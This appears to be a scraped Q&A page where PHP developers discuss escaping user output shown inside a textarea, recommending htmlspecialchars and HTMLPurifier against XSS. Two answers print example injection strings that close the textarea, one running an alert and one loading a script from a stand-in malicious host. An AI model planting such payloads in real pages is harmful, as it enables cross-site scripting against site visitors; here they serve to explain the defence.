CODEWITHSUNDEEP
phphtmltextarea
user1190646
user1190646

Reputation:

Need to escape or sanatise output that is displayed in a <textarea>?

Do you have to escape or sanatise output that will be in a <textarea>?

It seems that if i sanatise it using htmlentities() the actual &...; character replacements come up

Upvotes: 1

Views: 463

Answers (6)

Mike Brant
Mike Brant

Reputation: 71384

Just using htmlspecialchars() is NOT enough. It still leaves you vulnerable to certain multibyte character attack vectors (even when using htmlspecialchars($string, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')

Perhaps look at a library like HTMLPurifier to give you a more complete solution.

Here is a pretty good summary of XSS protection in PHP.

http://www.bytetouch.com/blog/programming/protecting-php-scripts-from-cross-site-scripting-xss-attacks/

Upvotes: 0

David M&#252;ller
David M&#252;ller

Reputation: 5351

Well, you have to:

<?php
$content = "</textarea><script>alert('hi!')</script>";
?>

<textarea>
<?php echo $content; ?>
</textarea>

enter image description here

Upvotes: 1

Mario
Mario

Reputation: 36497

Always escape all occurances of < and > (with &lt; and &gt;) within the textarea's content. Otherwise one could provide the following content (example) to "escape" the textarea and inject HTML code:

</textarea><script src="http://malicious.code.is/us.js"></script>

Otherwise this could result in the following code:

<textarea id="text"></textarea><script src="http://malicious.code.is/us.js"></script></textarea>

The second </textarea> at the end would be ignored and the script tag before would be executed.

Upvotes: 0

Alix Axel
Alix Axel

Reputation: 154573

Yes, you need to sanitize. Use htmlspecialchars($str, ENT_QUOTES) instead.

Upvotes: 0

Shoe
Shoe

Reputation: 76260

You need to consider whatever the output is editable by the user or not. If it not and it is a trusted output (maybe coming from pre defined texts that YOU wrote) you obviously don't. Otherwise yes. And the HTML chars replacement is quite normal but you don't have to worry because when the page is read and outputted to the user browser all the previous characters will still be there.

Notice that the > and < characters could be used, if not sanitize, to inject other HTML code and particular the <script> tag that can run Javascript.

Upvotes: 0

Mike Brant
Mike Brant

Reputation: 71384

If that output was initially provided by the user or any untrusted source (i.e. not directly from your code) then it needs to be sanitized to prevent against XSS attacks.

Upvotes: 0

Related Questions